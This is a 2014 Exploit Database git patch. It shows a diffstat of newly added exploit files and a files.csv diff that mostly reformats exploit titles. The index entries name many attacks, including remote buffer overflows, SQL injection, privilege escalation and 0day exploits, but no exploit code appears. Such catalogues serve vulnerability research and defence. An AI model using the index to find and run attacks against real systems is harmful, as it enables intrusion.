From 545c6bdf18c60a9615c73ac396b3634eff64f657 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Wed, 6 Aug 2014 04:39:53 +0000
Subject: [PATCH] Updated 08_06_2014

---
 files.csv                         |  68 ++++---
 platforms/ios/webapps/34263.txt   | 238 +++++++++++++++++++++++
 platforms/ios/webapps/34264.txt   | 296 ++++++++++++++++++++++++++++
 platforms/linux/local/34267.sh    |  55 ++++++
 platforms/linux/shellcode/34262.c | 144 ++++++++++++++
 platforms/php/webapps/34265.txt   |   9 +
 platforms/php/webapps/34266.txt   |  12 ++
 platforms/php/webapps/34268.txt   |  14 ++
 platforms/php/webapps/34269.txt   |  11 ++
 platforms/windows/dos/5235.py     | 186 +++++++++---------
 platforms/windows/remote/4866.py  | 236 +++++++++++------------
 platforms/windows/remote/5248.py  | 310 +++++++++++++++---------------
 platforms/windows/remote/5751.pl  | 286 +++++++++++++--------------
 13 files changed, 1326 insertions(+), 539 deletions(-)
 create mode 100755 platforms/ios/webapps/34263.txt
 create mode 100755 platforms/ios/webapps/34264.txt
 create mode 100755 platforms/linux/local/34267.sh
 create mode 100755 platforms/linux/shellcode/34262.c
 create mode 100755 platforms/php/webapps/34265.txt
 create mode 100755 platforms/php/webapps/34266.txt
 create mode 100755 platforms/php/webapps/34268.txt
 create mode 100755 platforms/php/webapps/34269.txt

diff --git a/files.csv b/files.csv
index cd67e2c58..0612d1c15 100755
--- a/files.csv
+++ b/files.csv
@@ -4506,7 +4506,7 @@ id,file,description,date,author,platform,type,port
 4863,platforms/php/webapps/4863.pl,"SmallNuke 2.0.4 Pass Recovery Remote SQL Injection Exploit",2008-01-08,"Eugene Minaev",php,webapps,0
 4864,platforms/php/webapps/4864.txt,"Zero CMS 1.0 - Alpha Arbitrary File Upload / SQL Injection Vulnerabilities",2008-01-08,KiNgOfThEwOrLd,php,webapps,0
 4865,platforms/php/webapps/4865.txt,"evilboard 0.1a (sql/xss) Multiple Vulnerabilities",2008-01-08,seaofglass,php,webapps,0
-4866,platforms/windows/remote/4866.py,"Microsoft DirectX SAMI File Parsing Remote Stack Overflow Exploit",2008-01-08,ryujin,windows,remote,0
+4866,platforms/windows/remote/4866.py,"Microsoft DirectX SAMI File Parsing - Remote Stack Overflow Exploit",2008-01-08,ryujin,windows,remote,0
 4867,platforms/php/webapps/4867.pl,"PHP Webquest 2.6 (id_actividad) Remote SQL Injection Exploit",2008-01-08,ka0x,php,webapps,0
 4868,platforms/windows/remote/4868.html,"Move Networks Quantum Streaming Player - SEH Overwrite Exploit",2008-01-08,Elazar,windows,remote,0
 4869,platforms/windows/remote/4869.html,"Gateway Weblaunch ActiveX Control Insecure Method Exploit",2008-01-08,Elazar,windows,remote,0
@@ -4870,7 +4870,7 @@ id,file,description,date,author,platform,type,port
 5232,platforms/php/webapps/5232.txt,"Mapbender <= 2.4.4 (mapFiler.php) Remote Code Execution Vulnerability",2008-03-11,"RedTeam Pentesting",php,webapps,0
 5233,platforms/php/webapps/5233.txt,"Mapbender 2.4.4 - (gaz) Remote SQL Injection Vulnerability",2008-03-11,"RedTeam Pentesting",php,webapps,0
 5234,platforms/php/webapps/5234.txt,"Bloo <= 1.00 Multiple Remote SQL Injection Vulnerabilities",2008-03-11,MhZ91,php,webapps,0
-5235,platforms/windows/dos/5235.py,"MailEnable SMTP Service VRFY/EXPN Command Buffer Overflow DoS",2008-03-11,ryujin,windows,dos,0
+5235,platforms/windows/dos/5235.py,"MailEnable SMTP Service - VRFY/EXPN Command Buffer Overflow DoS",2008-03-11,ryujin,windows,dos,0
 5236,platforms/php/webapps/5236.txt,"phpBB Mod FileBase (id) Remote SQL Injection Vulnerability",2008-03-11,t0pP8uZz,php,webapps,0
 5237,platforms/php/webapps/5237.txt,"Joomla Component ProductShowcase <= 1.5 - SQL Injection Vulnerability",2008-03-11,S@BUN,php,webapps,0
 5238,platforms/windows/remote/5238.py,"Motorola Timbuktu Pro 8.6.5/8.7 Path Traversal / Log Injection Exploit",2008-03-11,"Core Security",windows,remote,0
@@ -4883,7 +4883,7 @@ id,file,description,date,author,platform,type,port
 5245,platforms/php/webapps/5245.txt,"XOOPS Module tutorials (printpage.php) SQL Injection Vulnerability",2008-03-12,S@BUN,php,webapps,0
 5246,platforms/php/webapps/5246.txt,"easycalendar <= 4.0tr Multiple Vulnerabilities",2008-03-12,JosS,php,webapps,0
 5247,platforms/php/webapps/5247.txt,"easygallery <= 5.0tr Multiple Vulnerabilities",2008-03-12,JosS,php,webapps,0
-5248,platforms/windows/remote/5248.py,"MDaemon IMAP server 9.6.4 (FETCH) Remote Buffer Overflow Exploit",2008-03-13,ryujin,windows,remote,143
+5248,platforms/windows/remote/5248.py,"MDaemon IMAP server 9.6.4 - (FETCH) Remote Buffer Overflow Exploit",2008-03-13,ryujin,windows,remote,143
 5249,platforms/windows/remote/5249.pl,"MailEnable Pro/Ent <= 3.13 (Fetch) post-auth Remote BOF Exploit",2008-03-14,haluznik,windows,remote,0
 5250,platforms/windows/local/5250.cpp,"VLC <= 0.8.6e Subtitle Parsing Local Buffer Overflow Exploit",2008-03-14,"Mai Xuan Cuong",windows,local,0
 5252,platforms/php/webapps/5252.txt,"eXV2 Module MyAnnonces - (lid) Remote SQL Injection Vulnerability",2008-03-14,S@BUN,php,webapps,0
@@ -4893,7 +4893,7 @@ id,file,description,date,author,platform,type,port
 5256,platforms/php/webapps/5256.pl,"AuraCMS <= 2.2.1 (online.php) Remote Blind SQL Injection Exploit",2008-03-14,NTOS-Team,php,webapps,0
 5257,platforms/multiple/remote/5257.py,"Dovecot IMAP 1.0.10 <= 1.1rc2 - Remote Email Disclosure Exploit",2008-03-14,kingcope,multiple,remote,0
 5258,platforms/solaris/dos/5258.c,"SunOS 5.10 Sun Cluster rpc.metad Denial of Service PoC",2008-03-14,kingcope,solaris,dos,0
-5259,platforms/windows/remote/5259.py,"NetWin Surgemail 3.8k4-4 IMAP post-auth Remote LIST Universal Exploit",2008-03-14,ryujin,windows,remote,143
+5259,platforms/windows/remote/5259.py,"NetWin Surgemail 3.8k4-4 - IMAP post-auth Remote LIST Universal Exploit",2008-03-14,ryujin,windows,remote,143
 5260,platforms/php/webapps/5260.txt,"fuzzylime cms <= 3.01 (admindir) Remote File Inclusion Vulnerability",2008-03-14,irk4z,php,webapps,0
 5261,platforms/windows/dos/5261.py,"Rosoft Media Player 4.1.8 RML Stack Based Buffer Overflow PoC",2008-03-15,"Wiktor Sierocinski",windows,dos,0
 5262,platforms/php/webapps/5262.txt,"mutiple timesheets <= 5.0 - Multiple Vulnerabilities",2008-03-16,JosS,php,webapps,0
@@ -5371,7 +5371,7 @@ id,file,description,date,author,platform,type,port
 5748,platforms/php/webapps/5748.txt,"Joomla Component JoomlaDate (user) SQL injection Vulnerability",2008-06-05,His0k4,php,webapps,0
 5749,platforms/multiple/dos/5749.pl,"Asterisk (SIP channel driver / in pedantic mode) Remote Crash Exploit",2008-06-05,"Armando Oliveira",multiple,dos,0
 5750,platforms/windows/remote/5750.html,"Black Ice Software Inc Barcode SDK (BIDIB.ocx) Multiple Vulns",2008-06-05,shinnai,windows,remote,0
-5751,platforms/windows/remote/5751.pl,"freeSSHd 1.2.1 (Post Auth) Remote SEH Overflow Exploit",2008-06-06,ryujin,windows,remote,22
+5751,platforms/windows/remote/5751.pl,"freeSSHd 1.2.1 - (Post Auth) Remote SEH Overflow Exploit",2008-06-06,ryujin,windows,remote,22
 5752,platforms/php/webapps/5752.pl,"Joomla Component GameQ <= 4.0 - Remote SQL injection Vulnerability",2008-06-07,His0k4,php,webapps,0
 5753,platforms/asp/webapps/5753.txt,"JiRo?s FAQ Manager (read.asp fID) 1.0 - SQL Injection Vulnerability",2008-06-08,Zigma,asp,webapps,0
 5754,platforms/php/webapps/5754.txt,"phpinv 0.8.0 (lfi/xss) Multiple Vulnerabilities",2008-06-08,"CWH Underground",php,webapps,0
@@ -8425,7 +8425,7 @@ id,file,description,date,author,platform,type,port
 8931,platforms/php/webapps/8931.txt,"TorrentVolve 1.4 (deleteTorrent) Delete Arbitrary File Vulnerability",2009-06-11,Br0ly,php,webapps,0
 8932,platforms/php/webapps/8932.txt,"yogurt 0.3 (xss/SQL Injection) Multiple Vulnerabilities",2009-06-11,Br0ly,php,webapps,0
 8933,platforms/php/webapps/8933.php,"Sniggabo CMS (article.php id) Remote SQL Injection Exploit",2009-06-11,Lidloses_Auge,php,webapps,0
-8934,platforms/windows/remote/8934.py,"Apple iTunes 8.1.1.10 (itms/itcp) Remote Buffer Overflow Exploit (win)",2009-06-12,ryujin,windows,remote,0
+8934,platforms/windows/remote/8934.py,"Apple iTunes 8.1.1.10 - (itms/itcp) Remote Buffer Overflow Exploit (win)",2009-06-12,ryujin,windows,remote,0
 8935,platforms/php/webapps/8935.txt,"Zip Store Chat 4.0/5.0 (Auth Bypass) SQL Injection Vulnerability",2009-06-12,ByALBAYX,php,webapps,0
 8936,platforms/php/webapps/8936.txt,"4images <= 1.7.7 Filter Bypass HTML Injection/XSS Vulnerability",2009-06-12,Qabandi,php,webapps,0
 8937,platforms/php/webapps/8937.txt,"campus virtual-lms (xss/SQL Injection) Multiple Vulnerabilities",2009-06-12,Yasión,php,webapps,0
@@ -9425,7 +9425,7 @@ id,file,description,date,author,platform,type,port
 10059,platforms/jsp/webapps/10059.txt,"McAfee Network Security Manager < 5.1.11.8.1 - Information Disclosure Vulnerability",2009-11-12,"Daniel King",jsp,webapps,0
 10060,platforms/linux/local/10060.sh,"Geany .18 Local File Overwrite",2009-10-06,"Jeremy Brown",linux,local,0
 10061,platforms/jsp/webapps/10061.txt,"McAfee Network Security Manager < 5.1.11.8.1 - Multiple Cross Site Scripting Vulnerabilities",2009-11-12,"Daniel King",jsp,webapps,0
-10062,platforms/windows/dos/10062.py,"Novell eDirectory 883ftf3 nldap module Denial of Service",2009-11-16,ryujin,windows,dos,389
+10062,platforms/windows/dos/10062.py,"Novell eDirectory 883ftf3 - nldap module Denial of Service",2009-11-16,ryujin,windows,dos,389
 10064,platforms/php/webapps/10064.txt,"Joomla CB Resume Builder - SQL Injection",2009-10-05,kaMtiEz,php,webapps,0
 10067,platforms/php/webapps/10067.txt,"Joomla Soundset 1.0 - SQL Injection",2009-10-05,kaMtiEz,php,webapps,0
 10068,platforms/windows/dos/10068.rb,"Microsoft Windows 2000-2008 - Embedded OpenType Font Engine Remote Code Execution",2009-11-12,"H D Moore",windows,dos,0
@@ -9457,7 +9457,7 @@ id,file,description,date,author,platform,type,port
 10095,platforms/multiple/remote/10095.txt,"Samba 3.0.10 - 3.3.5 Format String And Security Bypass Vulnerabilities",2009-11-13,"Jeremy Allison",multiple,remote,0
 10096,platforms/php/webapps/10096.txt,"OS Commerce 2.2r2 authentication bypass",2009-11-13,"Stuart Udall",php,webapps,0
 10097,platforms/php/remote/10097.php,"PHP 5.2.11/5.3.0 - Multiple Vulnerabilities",2009-11-13,"Maksymilian Arciemowicz",php,remote,0
-10098,platforms/windows/remote/10098.py,"Novell eDirectory 8.8 SP5 iConsole Buffer Overflow",2009-11-16,ryujin,windows,remote,0
+10098,platforms/windows/remote/10098.py,"Novell eDirectory 8.8 SP5 - iConsole Buffer Overflow",2009-11-16,ryujin,windows,remote,0
 10099,platforms/windows/remote/10099.py,"HP Power Manager Administration - Universal Buffer Overflow Exploit",2009-11-16,ryujin,windows,remote,80
 10100,platforms/windows/dos/10100.py,"FTPDMIN 0.96 (LIST) Remote Denial of Service Exploit",2007-03-20,shinnai,windows,dos,21
 10101,platforms/php/webapps/10101.txt,"telepark wiki 2.4.23 - Multiple Vulnerabilities",2009-11-16,Abysssec,php,webapps,0
@@ -9544,7 +9544,7 @@ id,file,description,date,author,platform,type,port
 10252,platforms/php/webapps/10252.txt,"Joomla Component Quick News SQL Injection Vulnerability",2009-11-30,"Don Tukulesto",php,webapps,0
 10253,platforms/asp/webapps/10253.txt,"Eshopbuilde CMS SQL Injection Vulnerability",2009-11-30,Isfahan,asp,webapps,0
 10254,platforms/asp/webapps/10254.txt,"Xxasp 3.3.2 - SQL Injection",2009-11-30,Secu_lab_ir,asp,webapps,0
-10255,platforms/bsd/local/10255.txt,"FreeBSD Run-Time Link-Editor Local r00t Zeroday",2009-11-30,kingcope,bsd,local,0
+10255,platforms/bsd/local/10255.txt,"FreeBSD Run-Time Link-Editor Local r00t (0day)",2009-11-30,kingcope,bsd,local,0
 10256,platforms/php/webapps/10256.txt,"WP-Polls 2.x Incorrect Flood Filter",2009-11-30,Jbyte,php,webapps,0
 10257,platforms/windows/dos/10257.py,"XM Easy Professional FTP Server 5.8.0 - Denial of Service",2009-11-30,"Mert SARICA",windows,dos,21
 10258,platforms/windows/remote/10258.pl,"Golden FTP Server 4.30 File Deletion Vulnerability",2009-12-01,sharpe,windows,remote,21
@@ -11114,7 +11114,7 @@ id,file,description,date,author,platform,type,port
 12186,platforms/php/webapps/12186.pl,"vBulletin DoS - all version",2010-04-12,"Jim Salim",php,webapps,0
 12187,platforms/php/webapps/12187.txt,"Vieassociative Openmairie 1.01 beta (RFI/LFI) Multiple File Include Vulnerability",2010-04-12,"cr4wl3r ",php,webapps,0
 12188,platforms/multiple/dos/12188.txt,"VMware Remote Console e.x.p build-158248 - format string vulnerability",2010-04-12,"Alexey Sintsov",multiple,dos,0
-12189,platforms/windows/local/12189.php,"PHP 6.0 Dev str_transliterate() Buffer overflow - NX + ASLR Bypass",2010-04-13,ryujin,windows,local,0
+12189,platforms/windows/local/12189.php,"PHP 6.0 Dev - str_transliterate() Buffer Overflow (NX + ASLR Bypass)",2010-04-13,ryujin,windows,local,0
 12190,platforms/php/webapps/12190.txt,"Joomla Component Jvehicles (aid) SQL Injection Vulnerability",2010-04-13,"Don Tukulesto",php,webapps,0
 12191,platforms/php/webapps/12191.txt,"joomla component com_jp_jobs 1.2.0 - (id) SQL Injection Vulnerability",2010-04-13,v3n0m,php,webapps,0
 12192,platforms/php/webapps/12192.txt,"blog system <= 1.5 - Multiple Vulnerabilities",2010-04-13,"cp77fk4r ",php,webapps,0
@@ -11297,7 +11297,7 @@ id,file,description,date,author,platform,type,port
 12402,platforms/php/webapps/12402.txt,"Kasseler CMS 2.0.5 - Bypass / Download Backup Vulnerability",2010-04-26,indoushka,php,webapps,0
 12403,platforms/windows/local/12403.py,"IDEAL Administration 2010 10.2 - Local Buffer Overflow Exploit",2010-04-26,Dr_IDE,windows,local,0
 12404,platforms/windows/local/12404.py,"IDEAL Migration 2009 4.5.1 - Local Buffer Overflow Exploit",2010-04-26,Dr_IDE,windows,local,0
-12406,platforms/windows/local/12406.py,"Avast! 4.7 aavmker4.sys privilege escalation",2010-04-27,ryujin,windows,local,0
+12406,platforms/windows/local/12406.py,"Avast! 4.7 - aavmker4.sys Privilege Escalation",2010-04-27,ryujin,windows,local,0
 12407,platforms/php/webapps/12407.txt,"CMScout 2.08 SQL Injection Vulnerability",2010-04-26,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
 12408,platforms/windows/dos/12408.pl,"Safari 4.0.5 (531.22.7) Denial of Service",2010-04-26,"Xss mAn",windows,dos,0
 12410,platforms/php/webapps/12410.txt,"PostNuke 0.764 Module modload SQL Injection Vulnerability",2010-04-26,BILGE_KAGAN,php,webapps,0
@@ -13361,7 +13361,7 @@ id,file,description,date,author,platform,type,port
 15418,platforms/windows/dos/15418.html,"Internet Explorer Memory Corruption 0day Vulnerability",2010-11-04,Unknown,windows,dos,0
 15419,platforms/windows/dos/15419.txt,"Acrobat Reader 9.4 - Memory Corruption Vulnerability",2010-11-04,scup,windows,dos,0
 15420,platforms/windows/dos/15420.c,"Avast! Internet Security aswtdi.sys 0day Local DoS PoC",2010-11-04,"Nikita Tarakanov",windows,dos,0
-15421,platforms/windows/remote/15421.html,"Internet Explorer 6, 7, 8 Memory Corruption 0day Exploit",2010-11-04,ryujin,windows,remote,0
+15421,platforms/windows/remote/15421.html,"Internet Explorer 6, 7, 8 - Memory Corruption Exploit (0day)",2010-11-04,ryujin,windows,remote,0
 15422,platforms/windows/dos/15422.pl,"Sami HTTP Server 2.0.1 GET Request Denial of Service Exploit",2010-11-05,wingthor,windows,dos,0
 15423,platforms/android/remote/15423.html,"Android 2.0-2.1 - Reverse Shell Exploit",2010-11-05,"MJ Keith",android,remote,0
 15426,platforms/windows/dos/15426.txt,"Adobe Flash ActionIf Integer Denial of Service Vulnerability",2010-11-05,"Matthew Bergin",windows,dos,0
@@ -15573,7 +15573,7 @@ id,file,description,date,author,platform,type,port
 17970,platforms/php/webapps/17970.txt,"WP-SpamFree WordPress Spam Plugin SQL Injection Vulnerability",2011-10-11,cheki,php,webapps,0
 17972,platforms/php/webapps/17972.txt,"MyBB MyStatus 3.1 - SQL Injection Vulnerability",2011-10-12,Mario_Vs,php,webapps,0
 17973,platforms/php/webapps/17973.txt,"WordPress GD Star Rating plugin <= 1.9.10 SQL Injection",2011-10-12,"Miroslav Stampar",php,webapps,0
-17974,platforms/windows/remote/17974.html,"Mozilla Firefox Array.reduceRight() Integer Overflow Exploit",2011-10-12,ryujin,windows,remote,0
+17974,platforms/windows/remote/17974.html,"Mozilla Firefox - Array.reduceRight() Integer Overflow Exploit",2011-10-12,ryujin,windows,remote,0
 17975,platforms/windows/remote/17975.rb,"PcVue 10.0 SV.UIGrdCtrl.1 'LoadObject()/SaveObject()' Trusted DWORD Vulnerability",2011-10-12,metasploit,windows,remote,0
 17976,platforms/windows/remote/17976.rb,"Mozilla Firefox Array.reduceRight() Integer Overflow",2011-10-13,metasploit,windows,remote,0
 17977,platforms/windows/remote/17977.txt,"JBoss AS 2.0 - Remote Exploit",2011-10-11,kingcope,windows,remote,0
@@ -20276,14 +20276,14 @@ id,file,description,date,author,platform,type,port
 23072,platforms/php/webapps/23072.txt,"Ezboard 'invitefriends.php3' Cross Site Scripting Vulnerability",2003-09-01,"David F. Madrid",php,webapps,0
 23073,platforms/windows/remote/23073.txt,"MySQL 5.1/5.5 WiNDOWS REMOTE R00T (mysqljackpot)",2012-12-02,kingcope,windows,remote,0
 23074,platforms/windows/remote/23074.txt,"IBM System Director Remote System Level Exploit",2012-12-02,kingcope,windows,remote,0
-23075,platforms/linux/dos/23075.pl,"MySQL (Linux) Stack Based Buffer Overrun PoC Zeroday",2012-12-02,kingcope,linux,dos,0
-23076,platforms/linux/dos/23076.pl,"MySQL (Linux) Heap Based Overrun PoC Zeroday",2012-12-02,kingcope,linux,dos,0
-23077,platforms/linux/local/23077.pl,"MySQL (Linux) Database Privilege Elevation Zeroday Exploit",2012-12-02,kingcope,linux,local,0
-23078,platforms/linux/dos/23078.txt,"MySQL Denial of Service Zeroday PoC",2012-12-02,kingcope,linux,dos,0
-23079,platforms/windows/remote/23079.txt,"FreeFTPD Remote Authentication Bypass Zeroday Exploit",2012-12-02,kingcope,windows,remote,0
-23080,platforms/windows/remote/23080.txt,"FreeSSHD Remote Authentication Bypass Zeroday Exploit",2012-12-02,kingcope,windows,remote,0
-23081,platforms/multiple/remote/23081.pl,"MySQL Remote Preauth User Enumeration Zeroday",2012-12-02,kingcope,multiple,remote,0
-23082,platforms/linux/remote/23082.txt,"SSH.com Communications SSH Tectia Authentication Bypass Remote Zeroday Exploit",2012-12-02,kingcope,linux,remote,0
+23075,platforms/linux/dos/23075.pl,"MySQL (Linux) - Stack Based Buffer Overrun PoC (0day)",2012-12-02,kingcope,linux,dos,0
+23076,platforms/linux/dos/23076.pl,"MySQL (Linux) - Heap Based Overrun PoC (0day)",2012-12-02,kingcope,linux,dos,0
+23077,platforms/linux/local/23077.pl,"MySQL (Linux) - Database Privilege Elevation Exploit (0day)",2012-12-02,kingcope,linux,local,0
+23078,platforms/linux/dos/23078.txt,"MySQL - Denial of Service PoC (0day)",2012-12-02,kingcope,linux,dos,0
+23079,platforms/windows/remote/23079.txt,"FreeFTPD - Remote Authentication Bypass Exploit (0day)",2012-12-02,kingcope,windows,remote,0
+23080,platforms/windows/remote/23080.txt,"FreeSSHD - Remote Authentication Bypass Exploit (0day)",2012-12-02,kingcope,windows,remote,0
+23081,platforms/multiple/remote/23081.pl,"MySQL - Remote Preauth User Enumeration (0day)",2012-12-02,kingcope,multiple,remote,0
+23082,platforms/linux/remote/23082.txt,"SSH.com Communications SSH Tectia Authentication Bypass Remote Exploit (0day)",2012-12-02,kingcope,linux,remote,0
 23083,platforms/windows/remote/23083.txt,"MySQL Windows Remote System Level Exploit (Stuxnet technique) 0day",2012-12-02,kingcope,windows,remote,0
 23084,platforms/php/webapps/23084.txt,"TSguestbook 2.1 Message Field HTML Injection Vulnerability",2003-09-01,Trash-80,php,webapps,0
 23085,platforms/cgi/webapps/23085.html,"Sitebuilder 1.4 'sitebuilder.cgi' Directory Traversal File Disclosure Vulnerability",2003-09-01,"Zero X",cgi,webapps,0
@@ -21608,7 +21608,7 @@ id,file,description,date,author,platform,type,port
 24455,platforms/unix/remote/24455.rb,"Portable UPnP SDK unique_service_name() Remote Code Execution",2013-02-05,metasploit,unix,remote,0
 24456,platforms/php/webapps/24456.txt,"glossword 1.8.12 - Multiple Vulnerabilities",2013-02-05,AkaStep,php,webapps,0
 24457,platforms/php/webapps/24457.txt,"Glossword 1.8.3 - SQL Injection Vulnerability",2013-02-05,AkaStep,php,webapps,0
-24458,platforms/linux/local/24458.txt,"Oracle Automated Service Manager 1.3 Installation Local Privilege Escalation",2013-02-05,"Larry W. Cashdollar",linux,local,0
+24458,platforms/linux/local/24458.txt,"Oracle Automated Service Manager 1.3 - Installation Local Privilege Escalation",2013-02-05,"Larry W. Cashdollar",linux,local,0
 24459,platforms/linux/dos/24459.sh,"Linux Kernel /dev/ptmx Key Stroke Timing Local Disclosure",2013-02-05,vladz,linux,dos,0
 24460,platforms/windows/remote/24460.rb,"VMWare OVF Tools Format String Vulnerability",2013-02-06,metasploit,windows,remote,0
 24461,platforms/windows/remote/24461.rb,"VMWare OVF Tools Format String Vulnerability",2013-02-12,metasploit,windows,remote,0
@@ -21686,7 +21686,7 @@ id,file,description,date,author,platform,type,port
 24550,platforms/hardware/webapps/24550.txt,"WiFilet 1.2 iPad iPhone - Multiple Vulnerabilities",2013-02-26,Vulnerability-Lab,hardware,webapps,0
 24551,platforms/php/webapps/24551.txt,"Joomla! <= 3.0.2 (highlight.php) PHP Object Injection Vulnerability",2013-02-27,EgiX,php,webapps,0
 24552,platforms/php/webapps/24552.txt,"Wordpress Comment Rating Plugin 2.9.32 - Multiple Vulnerabilities",2013-02-27,ebanyu,php,webapps,0
-24555,platforms/linux/local/24555.c,"Archlinux x86-64 3.3.x-3.7.x x86-64 sock_diag_handlers[] Local Root",2013-02-27,sd,linux,local,0
+24555,platforms/linux/local/24555.c,"Archlinux x86-64 3.3.x-3.7.x x86-64 - sock_diag_handlers[] Local Root",2013-02-27,sd,linux,local,0
 24556,platforms/windows/dos/24556.py,"Hanso Player 2.1.0 (.m3u) - Buffer Overflow Vulnerability",2013-03-01,metacom,windows,dos,0
 24557,platforms/windows/remote/24557.py,"Sami FTP Server 2.0.1 LIST Command Buffer Overflow",2013-03-01,superkojiman,windows,remote,0
 24560,platforms/php/webapps/24560.txt,"doorGets CMS - CSRF Vulnerability",2013-03-01,n0pe,php,webapps,0
@@ -22039,7 +22039,7 @@ id,file,description,date,author,platform,type,port
 24926,platforms/hardware/webapps/24926.txt,"Multiple D-Link Devices - Multiple Vulnerabilities",2013-04-08,m-1-k-3,hardware,webapps,0
 24927,platforms/php/webapps/24927.txt,"Vanilla Forums 2-0-18-4 - SQL-Injection Vulnerability",2013-04-08,bl4ckw0rm,php,webapps,0
 24928,platforms/hardware/webapps/24928.txt,"TP-Link TD-8817 6.0.1 Build 111128 Rel.26763 - CSRF Vulnerability",2013-04-08,Un0wn_X,hardware,webapps,0
-24929,platforms/linux/local/24929.rb,"HP System Management Homepage Local Privilege Escalation",2013-04-08,metasploit,linux,local,0
+24929,platforms/linux/local/24929.rb,"HP System Management Homepage - Local Privilege Escalation",2013-04-08,metasploit,linux,local,0
 24930,platforms/windows/dos/24930.txt,"Groovy Media Player 3.2.0 (.mp3) - Buffer Overflow Vulnerability",2013-04-08,"Akshaysinh Vaghela",windows,dos,0
 24931,platforms/hardware/remote/24931.rb,"Netgear DGN1000B setup.cgi Remote Command Execution",2013-04-08,metasploit,hardware,remote,0
 24932,platforms/linux/webapps/24932.txt,"Sophos Web Protection Appliance 3.7.8.1 - Multiple Vulnerabilities",2013-04-08,"SEC Consult",linux,webapps,0
@@ -23071,7 +23071,7 @@ id,file,description,date,author,platform,type,port
 25983,platforms/cfm/webapps/25983.txt,"Simple Message Board 2.0 beta1 User.CFM Cross-Site Scripting Vulnerability",2005-07-14,rUnViRuS,cfm,webapps,0
 25984,platforms/cfm/webapps/25984.txt,"Simple Message Board 2.0 beta1 Thread.CFM Cross-Site Scripting Vulnerability",2005-07-14,rUnViRuS,cfm,webapps,0
 25985,platforms/cfm/webapps/25985.txt,"Simple Message Board 2.0 beta1 Search.CFM Cross-Site Scripting Vulnerability",2005-07-14,rUnViRuS,cfm,webapps,0
-25986,platforms/php/remote/25986.txt,"Plesk < 9.5.4 - Zeroday Remote Exploit",2013-06-05,kingcope,php,remote,0
+25986,platforms/php/remote/25986.txt,"Plesk < 9.5.4 - Remote Exploit (0day)",2013-06-05,kingcope,php,remote,0
 25987,platforms/hardware/remote/25987.txt,"Xpient Cash Drawer Operation Vulnerability",2013-06-05,"Core Security",hardware,remote,0
 25988,platforms/multiple/remote/25988.txt,"Oracle9i Application Server 9.0.2 MOD_ORADAV Access Control Vulnerability",2003-02-13,"David Litchfield",multiple,remote,0
 25989,platforms/windows/remote/25989.txt,"Nullsoft Winamp 5.0 - Malformed ID3v2 Tag Buffer Overflow Vulnerability",2005-07-15,"Leon Juranic",windows,remote,0
@@ -23522,7 +23522,7 @@ id,file,description,date,author,platform,type,port
 26448,platforms/windows/local/26448.py,"AudioCoder 0.8.22 (.lst) - Direct Retn Buffer Overflow",2013-06-26,Onying,windows,local,0
 26449,platforms/php/webapps/26449.txt,"e107 Advanced Medal System Plugin - SQL Injection Vulnerability",2013-06-26,"Life Wasted",php,webapps,0
 26450,platforms/windows/dos/26450.pl,"Baby FTP Server 1.24 - Denial of Service",2013-06-26,Chako,windows,dos,21
-26451,platforms/linux/local/26451.rb,"ZPanel zsudo Local Privilege Escalation Exploit",2013-06-26,metasploit,linux,local,0
+26451,platforms/linux/local/26451.rb,"ZPanel zsudo - Local Privilege Escalation Exploit",2013-06-26,metasploit,linux,local,0
 26452,platforms/win32/local/26452.rb,"Novell Client 2 SP3 nicm.sys Local Privilege Escalation",2013-06-26,metasploit,win32,local,0
 26453,platforms/php/webapps/26453.py,"PHP Charts 1.0 (index.php, type param) - Remote Code Execution",2013-06-26,infodox,php,webapps,0
 26454,platforms/freebsd/local/26454.rb,"FreeBSD 9 Address Space Manipulation Privilege Escalation",2013-06-26,metasploit,freebsd,local,0
@@ -24964,7 +24964,7 @@ id,file,description,date,author,platform,type,port
 27932,platforms/asp/webapps/27932.txt,"Hogstorps Guestbook 2.0 Unauthorized Access Vulnerability",2006-05-01,omnipresent,asp,webapps,0
 27933,platforms/php/webapps/27933.txt,"Tekno.Portal Bolum.PHP SQL Injection Vulnerability",2006-06-01,SpC-x,php,webapps,0
 27934,platforms/php/webapps/27934.txt,"Abarcar Realty Portal 5.1.5 Content.PHP SQL Injection Vulnerability",2006-06-01,SpC-x,php,webapps,0
-27938,platforms/linux/local/27938.rb,"VMWare Setuid vmware-mount Unsafe popen(3)",2013-08-29,metasploit,linux,local,0
+27938,platforms/linux/local/27938.rb,"VMWare - Setuid vmware-mount Unsafe popen(3)",2013-08-29,metasploit,linux,local,0
 27939,platforms/windows/remote/27939.rb,"HP LoadRunner lrFileIOService ActiveX Remote Code Execution",2013-08-29,metasploit,windows,remote,0
 27940,platforms/windows/remote/27940.rb,"Firefox XMLSerializer Use After Free",2013-08-29,metasploit,windows,remote,0
 27941,platforms/php/remote/27941.rb,"SPIP connect Parameter PHP Injection",2013-08-29,metasploit,php,remote,0
@@ -25344,7 +25344,7 @@ id,file,description,date,author,platform,type,port
 28329,platforms/php/webapps/28329.txt,"OpenEMR 4.1.1 Patch 14 - Multiple Vulnerabilities",2013-09-17,xistence,php,webapps,0
 28330,platforms/php/webapps/28330.txt,"Western Digital Arkeia Appliance 10.0.10 - Multiple Vulnerabilities",2013-09-17,xistence,php,webapps,0
 28331,platforms/windows/remote/28331.txt,"Oracle Java ShortComponentRaster.verify() Memory Corruption",2013-09-17,"Packet Storm",windows,remote,0
-28332,platforms/linux/local/28332.rb,"Sophos Web Protection Appliance clear_keys.pl Local Privilege Escalation",2013-09-17,metasploit,linux,local,0
+28332,platforms/linux/local/28332.rb,"Sophos Web Protection Appliance - clear_keys.pl Local Privilege Escalation",2013-09-17,metasploit,linux,local,0
 28333,platforms/unix/remote/28333.rb,"D-Link Devices UPnP SOAP Telnetd Command Execution",2013-09-17,metasploit,unix,remote,49152
 28334,platforms/linux/remote/28334.rb,"Sophos Web Protection Appliance sblistpack Arbitrary Command Execution",2013-09-17,metasploit,linux,remote,443
 28335,platforms/windows/local/28335.rb,"Agnitum Outpost Internet Security Local Privilege Escalation",2013-09-17,metasploit,windows,local,0
@@ -29437,7 +29437,7 @@ id,file,description,date,author,platform,type,port
 32697,platforms/linux/dos/32697.pl,"aMSN '.ctt' File Remote Denial of Service Vulnerability",2009-01-03,Hakxer,linux,dos,0
 32698,platforms/php/webapps/32698.txt,"SolucionXpressPro 'main.php' SQL Injection Vulnerability",2009-01-05,Ehsan_Hp200,php,webapps,0
